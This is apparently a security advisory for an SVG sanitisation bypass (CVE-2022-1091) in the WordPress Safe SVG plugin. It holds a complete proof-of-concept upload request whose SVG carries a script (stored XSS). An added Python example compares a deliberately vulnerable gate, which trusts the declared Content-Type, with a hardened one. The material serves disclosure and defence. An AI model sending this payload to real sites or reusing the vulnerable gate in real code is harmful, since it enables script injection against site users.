Safe SVG < 1.9.10 - SVG Sanitisation Bypass

Published: 25 Mar 2022
Reported by: David Hamann
Type: wpexploit

Safe SVG Sanitisation Bypass in POST request to the async-upload.php endpoint. The plugin's sanitisation is keyed on the Content-Type the client declares for the multipart file part, not on the file name or the bytes uploaded. A user with upload capability can therefore submit a file named *.svg while labelling the part image/png; the SVG is stored unsanitised and the script it carries runs when the attachment is viewed (stored cross-site scripting). Fixed in 1.9.10.

Related references (source, title, published):

Github Security Blog   Cross site scripting in safe-svg                                          19 Apr 2022 00:00
Prion                  Cross site request forgery (csrf)                                         18 Apr 2022 18:15
OSV                    CVE-2022-1091                                                             18 Apr 2022 18:15
OSV                    Cross site scripting in safe-svg                                          19 Apr 2022 00:00
CVE                    CVE-2022-1091                                                             18 Apr 2022 18:15
Cvelist                CVE-2022-1091 Safe SVG < 1.9.10 - SVG Sanitisation Bypass                 18 Apr 2022 17:10
NVD                    CVE-2022-1091                                                             18 Apr 2022 18:15
OpenVAS                WordPress Safe SVG Plugin < 1.9.10 Content-Type Bypass Vulnerability      18 Sep 2023 00:00
WPVulnDB               Safe SVG < 1.9.10 - SVG Sanitisation Bypass                               25 Mar 2022 00:00

Proof-of-concept request (Cookie: a user with upload capability; _wpnonce: the upload nonce issued to that user; note the .svg file name against the image/png part Content-Type):
POST /wp-admin/async-upload.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------27451310545300823063986174174
Content-Length: 947
Connection: close
Cookie: [user with upload capability]

-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="name"

xss.svg
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="action"

upload-attachment
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="_wpnonce"

b281e72731
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="async-upload"; filename="xss.svg"
Content-Type: image/png

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(/XSS/);</script>
</svg>

-----------------------------27451310545300823063986174174--
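The request above works because the decision "is this an SVG that needs sanitising?" is taken from the part's Content-Type, which the uploader controls. The following is an added example, not code from the Safe SVG plugin or from the reporter: a gate that trusts the declared type, next to a hardened gate that also looks at the file extension and sniffs the bytes, plus a scan that lists the active content a sanitiser would have to strip. The sample file part is constructed from the PoC; the function names, the PNG stand-in and the 4 KiB sniff window are this example's own choices.

```python
"""Added example (not the Safe SVG plugin's code): a sanitisation gate that
trusts the client-declared Content-Type, next to a hardened gate that
decides from the file name and the bytes, exercised on the PoC's SVG."""
import re
import xml.etree.ElementTree as ET

# Constructed sample, copied from the PoC's multipart file part: the file
# name says .svg while the part's Content-Type claims image/png.
POC_FILENAME = "xss.svg"
POC_DECLARED_TYPE = "image/png"
POC_BODY = b"""<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(/XSS/);</script>
</svg>
"""
PNG_BODY = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # constructed stand-in for a real PNG


def needs_sanitising_vulnerable(filename, declared_type, body):
    """Vulnerable pattern: sanitise only when the *client* says it is SVG.
    Anything else is passed through untouched, whatever the bytes are."""
    return declared_type == "image/svg+xml"


def looks_like_svg(body):
    """Content sniff: drop BOM, XML prolog, DOCTYPE and comments from the
    first 4 KiB, then check that the first element is <svg>."""
    head = body[:4096]
    if head.startswith(b"\xef\xbb\xbf"):
        head = head[3:]
    text = head.decode("utf-8", "replace")
    text = re.sub(r"<\?xml.*?\?>|<!DOCTYPE[^>]*>|<!--.*?-->", "", text, flags=re.S)
    return re.match(r"<svg[\s>]", text.lstrip(), flags=re.I) is not None


def needs_sanitising_hardened(filename, declared_type, body):
    """Hardened gate: the extension, the declared type *or* the bytes saying
    SVG is enough; the client cannot opt out by mislabelling the part."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return (ext in ("svg", "svgz")
            or declared_type == "image/svg+xml"
            or looks_like_svg(body))


def active_content(body):
    """Names of what a sanitiser must strip from this SVG: script and
    foreignObject elements, on* event handlers and javascript: hrefs."""
    findings = []
    root = ET.fromstring(body)  # expat does not fetch the external DTD
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1]  # strip the namespace URI
        if tag.lower() in ("script", "foreignobject"):
            findings.append(tag)
        for attr, value in el.attrib.items():
            name = attr.rsplit("}", 1)[-1].lower()
            if name.startswith("on") or (
                name == "href" and value.strip().lower().startswith("javascript:")
            ):
                findings.append(f"{tag}@{name}")
    return findings


if __name__ == "__main__":
    args = (POC_FILENAME, POC_DECLARED_TYPE, POC_BODY)
    print("vulnerable gate sanitises PoC:", needs_sanitising_vulnerable(*args))  # False
    print("hardened gate sanitises PoC:  ", needs_sanitising_hardened(*args))    # True
    print("active content in PoC:        ", active_content(POC_BODY))             # ['script']
```

The vulnerable gate returns False for the PoC part, so the file would be stored as uploaded; the hardened gate returns True on the .svg extension alone, and would still return True for the same bytes under a neutral name such as blob.bin because the sniff sees the <svg> root. Whichever gate is used, the stored copy must then actually pass through a sanitiser that removes the items active_content() reports; the gate only decides whether that step runs.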
